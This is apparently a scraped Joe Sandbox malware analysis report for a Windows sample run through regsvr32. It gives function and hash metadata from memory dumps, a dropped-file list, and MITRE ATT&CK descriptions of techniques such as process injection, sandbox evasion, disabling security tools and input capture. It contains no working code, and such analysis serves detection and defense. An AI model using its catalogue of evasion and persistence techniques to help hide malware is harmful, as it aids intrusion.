Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap$CloseHandle
String ID:
API String ID: 1910495013-0
Opcode ID: 0bfa028432db9a10137cc68a0ebb823f194a60a9226239242768e5e79dc9ef3e
Instruction ID: 240ba839880f1010e08f470b9451e0f30d3c9be71f16fe0fb1a421cde7f420cd
Opcode Fuzzy Hash: 0bfa028432db9a10137cc68a0ebb823f194a60a9226239242768e5e79dc9ef3e
Instruction Fuzzy Hash: 8E115B1190EEC2A0E664EF56D4583FAA3B1FFC8BC4F446071D64EC66AACF7DD4408600

Function 00007FF8A9307E85 Relevance: 5.0, APIs: 4, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A93087AE
CloseHandle.KERNEL32 ref: 00007FF8A93087B8
HeapFree.KERNEL32 ref: 00007FF8A93087D9
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap$CloseHandle
String ID:
API String ID: 1910495013-0
Opcode ID: 6c9288677f01b4ba7eecc4d2c393b739d751872e387bb4cdc77548e7ae6b1535
Instruction ID: a66033b37b612d02bcdcfb8c81af5e795f34e058c9ce1c9c35dec672b07b4418
Opcode Fuzzy Hash: 6c9288677f01b4ba7eecc4d2c393b739d751872e387bb4cdc77548e7ae6b1535
Instruction Fuzzy Hash: E4014C1590EDC2A0E664EF56D4183FAA7B1FFC8BC4F446071DA4ECA6AACF7DE4408600

Function 00007FF8A934B0F2 Relevance: 5.0, APIs: 4, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8A934B250: CloseHandle.KERNEL32 ref: 00007FF8A934B37A
Part of subcall function 00007FF8A934B250: CloseHandle.KERNEL32 ref: 00007FF8A934B383

Part of subcall function 00007FF8A934B250: HeapFree.KERNEL32 ref: 00007FF8A934B3E0
Part of subcall function 00007FF8A934B250: CloseHandle.KERNEL32 ref: 00007FF8A934B3F1
Part of subcall function 00007FF8A934B250: CloseHandle.KERNEL32 ref: 00007FF8A934B3FA
Part of subcall function 00007FF8A934B250: HeapFree.KERNEL32 ref: 00007FF8A934B40C

HeapFree.KERNEL32 ref: 00007FF8A934B123
HeapFree.KERNEL32 ref: 00007FF8A934B142
CloseHandle.KERNEL32 ref: 00007FF8A934B153
CloseHandle.KERNEL32 ref: 00007FF8A934B15C

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: CloseHandle$FreeHeap
String ID:
API String ID: 2735614835-0
Opcode ID: fa3216b5d43bb4dc64bfe5e81a82c1d356ea0ad4b608b2f9cc36d2a0914ea8cb
Instruction ID: bcc75c26ae5755340f0b118ac02da7b3430d9d5f761cc4479351ef896ee55e51
Opcode Fuzzy Hash: fa3216b5d43bb4dc64bfe5e81a82c1d356ea0ad4b608b2f9cc36d2a0914ea8cb
Instruction Fuzzy Hash: 4001A415A0EEC2A8EB64EF31D8553FD2270EF857C9F417072E90ECA696CE2DE145D241

Function 00007FF8A934B08D Relevance: 5.0, APIs: 4, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8A934B250: CloseHandle.KERNEL32 ref: 00007FF8A934B37A
Part of subcall function 00007FF8A934B250: CloseHandle.KERNEL32 ref: 00007FF8A934B383

Part of subcall function 00007FF8A934B250: HeapFree.KERNEL32 ref: 00007FF8A934B3E0
Part of subcall function 00007FF8A934B250: CloseHandle.KERNEL32 ref: 00007FF8A934B3F1
Part of subcall function 00007FF8A934B250: CloseHandle.KERNEL32 ref: 00007FF8A934B3FA
Part of subcall function 00007FF8A934B250: HeapFree.KERNEL32 ref: 00007FF8A934B40C

HeapFree.KERNEL32 ref: 00007FF8A934B123
HeapFree.KERNEL32 ref: 00007FF8A934B142
CloseHandle.KERNEL32 ref: 00007FF8A934B153
CloseHandle.KERNEL32 ref: 00007FF8A934B15C

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: CloseHandle$FreeHeap
String ID:
API String ID: 2735614835-0
Opcode ID: bf1781f6e3866917d0d02452ac8eeae28f382fde46d7386b9bca9f5d1ba4885b
Instruction ID: bcc75c26ae5755340f0b118ac02da7b3430d9d5f761cc4479351ef896ee55e51
Opcode Fuzzy Hash: bf1781f6e3866917d0d02452ac8eeae28f382fde46d7386b9bca9f5d1ba4885b
Instruction Fuzzy Hash: 4001A415A0EEC2A8EB64EF31D8553FD2270EF857C9F417072E90ECA696CE2DE145D241

Function 00007FF8A934B0CF Relevance: 5.0, APIs: 4, Instructions: 27memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A934B123
HeapFree.KERNEL32 ref: 00007FF8A934B142
CloseHandle.KERNEL32 ref: 00007FF8A934B153
CloseHandle.KERNEL32 ref: 00007FF8A934B15C

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: CloseFreeHandleHeap
String ID:
API String ID: 1642312469-0
Opcode ID: 7e50c8ae8127694478953b4d46517d7a9d04455dada6b78dcd8e41f8ed7f1500
Instruction ID: 5f3725f2e56a67b1e9e0fff509e79d1b0d48f2dec59cdfd4c1f89f5088995435
Opcode Fuzzy Hash: 7e50c8ae8127694478953b4d46517d7a9d04455dada6b78dcd8e41f8ed7f1500
Instruction Fuzzy Hash: CCF0C91590EEC2A8EB64AF21C8653FD2270EF857C9F407076D50ECA6D6CE2CE1449241

Function 00007FF8A934B0CA Relevance: 5.0, APIs: 4, Instructions: 27memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8A934B250: CloseHandle.KERNEL32 ref: 00007FF8A934B37A
Part of subcall function 00007FF8A934B250: CloseHandle.KERNEL32 ref: 00007FF8A934B383

HeapFree.KERNEL32 ref: 00007FF8A934B123
HeapFree.KERNEL32 ref: 00007FF8A934B142
CloseHandle.KERNEL32 ref: 00007FF8A934B153
CloseHandle.KERNEL32 ref: 00007FF8A934B15C

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: CloseHandle$FreeHeap
String ID:
API String ID: 2735614835-0
Opcode ID: 9fa77a0da0bdeb011a8e95ded042a9900748a6df1b4e795fc97fe10b7b97837c
Instruction ID: f59f0e83fb855d2ce2e94eb577f714729bb4e6b5afb190209694b0e6ee3f3fcd
Opcode Fuzzy Hash: 9fa77a0da0bdeb011a8e95ded042a9900748a6df1b4e795fc97fe10b7b97837c
Instruction Fuzzy Hash: 48F01414A0EEC6A8EB64EF31C8553FD2270EF897C9F407432E90ECA696CE2CE144C241

Function 00007FF8A934B08F Relevance: 5.0, APIs: 4, Instructions: 25memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A934B123
HeapFree.KERNEL32 ref: 00007FF8A934B142
CloseHandle.KERNEL32 ref: 00007FF8A934B153
CloseHandle.KERNEL32 ref: 00007FF8A934B15C

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: CloseFreeHandleHeap
String ID:
API String ID: 1642312469-0
Opcode ID: 8844cfa4f3ecf9a3674ced53c3a262d7b173508b0bfe679dda287b5f2ff1088c
Instruction ID: 6296fe20342e7b62c2496a9f10f8ef873f8160f37e9e83e0da039257c34dc488
Opcode Fuzzy Hash: 8844cfa4f3ecf9a3674ced53c3a262d7b173508b0bfe679dda287b5f2ff1088c
Instruction Fuzzy Hash: D0F0F91490EEC2A8FB24AF2188653FD2270EF897C9F407471D90ECA696CE2CE1449241

Function 00007FF8A9347681 Relevance: 5.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF8A934768C
CloseHandle.KERNEL32 ref: 00007FF8A9347694
CloseHandle.KERNEL32 ref: 00007FF8A93476BA

Part of subcall function 00007FF8A9354020: abort.MSVCRT ref: 00007FF8A9354147

CloseHandle.KERNEL32 ref: 00007FF8A934769D

Part of subcall function 00007FF8A9354020: RtlCaptureContext.NTDLL ref: 00007FF8A93540B2
Part of subcall function 00007FF8A9354020: RtlUnwindEx.KERNEL32 ref: 00007FF8A93540EF
Part of subcall function 00007FF8A9354020: abort.MSVCRT ref: 00007FF8A93540F5
Part of subcall function 00007FF8A9354020: RaiseException.KERNEL32 ref: 00007FF8A9354132

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: CloseHandle$abort$CaptureContextExceptionRaiseUnwind
String ID:
API String ID: 2803952147-0
Opcode ID: de80a76cf8ff7457b6c3fccbe0903b051dc1579ec8fc195c4452e6d0c255da71
Instruction ID: 1e524d5538296e4551f282fc5c3c01fdc2c0c85c9e0d32d177603253d5a4f080
Opcode Fuzzy Hash: de80a76cf8ff7457b6c3fccbe0903b051dc1579ec8fc195c4452e6d0c255da71
Instruction Fuzzy Hash: 63E07D15A0EA86B9E508BE6194553BD6670AF99FC1F5470B0E90F87797CD2CA0018204

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Module: Module Load, Network Traffic: Network Connection Creation, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report h40thEqmz6.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_03q2atcw.qqp.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dqwranwo.413.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hnqqz2p4.f5x.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pp5ruzs0.rr0.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tpmhjexg.01m.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yfjybxrv.lio.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ym2u22ik.y4d.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z2d3lt1x.2rr.ps1

C:\Users\user\AppData\Local\Temp\is-IC11J.tmp\_isetup\_setup64.tmp

C:\Users\user\AppData\Local\Temp\is-IC11J.tmp\_isetup\_shfoldr.dll

C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp

C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp

C:\Users\user\AppData\Local\Temp\is-PH0LE.tmp\_isetup\_setup64.tmp

C:\Users\user\AppData\Local\Temp\is-PH0LE.tmp\_isetup\_shfoldr.dll

C:\Users\user\AppData\Local\Temp\second_data_temp.zip

Windows Analysis Report
h40thEqmz6.exe

